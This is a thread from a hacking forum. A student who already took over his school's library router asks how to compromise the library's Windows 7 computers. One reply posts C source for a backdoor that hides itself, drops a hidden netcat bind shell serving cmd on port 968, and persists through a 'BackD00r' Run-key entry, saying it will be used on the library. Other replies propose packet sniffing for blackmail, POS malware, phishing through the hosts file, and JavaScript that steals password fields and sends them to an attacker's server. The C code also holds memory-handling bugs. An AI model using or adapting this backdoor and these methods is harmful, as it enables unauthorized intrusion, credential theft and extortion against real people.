EvilZone
Hacking and Security => Hacking and Security => : L4T1N February 12, 2015, 01:53:51 PM
-
Hiii Everyone :P
So i just had a quick question. My school has a wifi set up for the library which is not free to access. Unfortunately the AP is reachable from the IT class so i simply logged into the router with the default password and set up my own little AP for free wifi :D
I am now bored with this and would like to do something else.
The computers in the library all run windows 7 and F-PROT if i'm not mistaken. Luckily though the administrator account has no password. I thought I'd create a simple piece of malware in C that would allow me to execute commands from either my phone or the computers in the IT class on the computers in the library ( I know i can use nc for this :D ) I don't think this will be particularly hard though and i'm getting kind of bored.
Any ideas? :P
-
I'm probably not good enough to do that just yet :/
If i had to think of a few ways though i'd abuse the fact that masked input boxes in html don't protect the actual value in memory so doing something like document.getElementById("j_pin").value would return the actual pin someone uses to login to a bank website. Of course you'd have to be on the computer in question and someone would need to distract the person in question aaaaaaaaaannnnnnnnnnddddd hopefully something like remember my password is enabled on the browser.
Blackmail with some information i can get by sniffing packets travelling through the network? I do have access to the router so setting it up to forward all traffic to the computer I control and setting up a packet sniffer would be easy.
Uhm. That's about all i can think of so quickly :3
-
I'm probably not good enough to do that just yet :/
If i had to think of a few ways though i'd abuse the fact that masked input boxes in html don't protect the actual value in memory so doing something like document.getElementById("j_pin").value would return the actual pin someone uses to login to a bank website. Of course you'd have to be on the computer in question and someone would need to distract the person in question aaaaaaaaaannnnnnnnnnddddd hopefully something like remember my password is enabled on the browser.
Blackmail with some information i can get by sniffing packets travelling through the network? I do have access to the router so setting it up to forward all traffic to the computer I control and setting up a packet sniffer would be easy.
Uhm. That's about all i can think of so quickly :3
Pfft seems like a lot of boring work for little money it's easier to steal a wallet :P
You could always install a POS malware in a store that sells extremely valuable items and steal cash from some caviar eating fucks. Or steal some bitcoin from the heroïn dealers of doom. But give a lot of money to the ultra poor as well then to fix your cosmic karma.
Until then keep drinking that hot coffee
-
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <CustomHeader_Small.h>
int main()
{
char Title[255];
GetConsoleTitle(Title,sizeof(Title));
ShowWindow(FindWindow(NULL,Title),0);
free(Title);
char *File = malloc(1);
File = getenv("appdata");
strcat(File,"\\nc.exe");
if (FileExists(File)==0)
{
CopyFile("nc.exe",File,0);
SetFileAttributes(File,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);
}
if (ShellExecute(0,"open",File,"-l -e cmd -p 968 -L",0,0) < 32)
Beep(100,50);
HKEY RegHandler;
if (RegOpenKeyExA(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&RegHandler)!=ERROR_SUCCESS)
{
main();
}
else
{
strcat(File," -l -e cmd -p 968 -L");
if (RegSetValueEx(RegHandler,"BackD00r",0,REG_SZ,File,strlen(File)) != ERROR_SUCCESS)
Beep(100,50);
RegCloseKey(RegHandler);
}
free(File);
return 0;
}
I'll be using this for the school's library :P
-
Am I the only one seeing the helloworld! in the URL?!?
-
Haha i changed the subject that's why it's there XD
-
I haven't created the malware just yet :P I just think it's possible :O and i'm out of school next year :P
Doesn't have to be malware either. The problem is because of HTML so any site using a masked input box is exploitable
-
Set up a normal back door using nc set to start on boot, if nc is detected by the av then think about writing a PE file but remember the most simple option is most likely to work. As for stealing credentials you can either use a keylogger or you could even go old school and change the host file to add a fake login pages for banks (phishing) or inject JavaScript into web requests which silently reads the value of the the password field and creates a hidden image element to send it back to a server you control (remember you can also steal credentials through hidden fields if auto complete is enabled and you change the action value of the form to your script) the list of possibilities is endless!
-
I would setup Evil Twin, and redirect to a site you setup to steal some data xD
-
I envy your C program ::) . WTF is in the
CustomHeader_Small header file anyway?
-
RegSetValueEx(RegHandler,"BackD00r"
lulz